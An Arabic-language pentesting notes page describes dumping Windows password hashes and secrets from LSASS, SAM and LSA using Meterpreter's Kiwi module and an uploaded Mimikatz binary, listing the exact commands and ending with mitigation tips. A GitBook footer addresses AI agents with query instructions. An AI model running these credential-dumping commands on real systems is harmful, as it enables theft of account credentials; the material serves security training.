> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md).

# تفريغ تجزئات Windows باستخدام Mimikatz

يمكن لـ Mimikatz وMeterpreter Kiwi استخراج أسرار Windows من LSASS وقاعدة بيانات SAM وأسرار LSA. استخدم النتائج للتحقق من تأثير الوصول المحلي أو جلسة مخترقة.

## وحدة Kiwi في Meterpreter

```
load kiwi
```

<figure><img src="/files/c44517839ce384f3be8fe1461f28ac9d753662ec" alt="Loading Kiwi in Meterpreter"><figcaption></figcaption></figure>

سرد بيانات الاعتماد المتاحة:

```
creds_all
```

<figure><img src="/files/345c2bbb2ea77d19e8d702118bb24d55e6ed23ff" alt="Kiwi credential listing"><figcaption></figcaption></figure>

## تفريغ SAM وأسرار LSA

```
lsa_dump_sam
```

<figure><img src="/files/c50f18946cd8a7a169b583dfbd2a9acde1c01b9a" alt="SAM dump with Kiwi"><figcaption></figcaption></figure>

```
lsa_dump_secrets
```

<figure><img src="/files/22b952fe493e5f18572ee8b21557b52ebe0c40ac" alt="LSA secrets dump with Kiwi"><figcaption></figcaption></figure>

## تشغيل Mimikatz

```
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords
```

<figure><img src="/files/dd7bcd30d0137753379f35f5bce22abd573a04a2" alt="Uploading Mimikatz"><figcaption></figcaption></figure>

<figure><img src="/files/30c22957e1041b937dda1d59d6509e63d4de8fe7" alt="Mimikatz SAM and secrets commands"><figcaption></figcaption></figure>

<figure><img src="/files/a1b624b9c723ab1d5455feb5de7bdbe2d521f6cf" alt="Mimikatz credential output"><figcaption></figcaption></figure>

## النقاط الرئيسية

* قد يحتوي LSASS على بيانات اعتماد من جلسات تسجيل دخول نشطة.
* يحتوي SAM على تجزئات NTLM للحسابات المحلية.
* عالج ذلك باستخدام Credential Guard، وتقليل تعرّض حسابات المسؤول المحلي، ومراقبة وصول LSASS.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
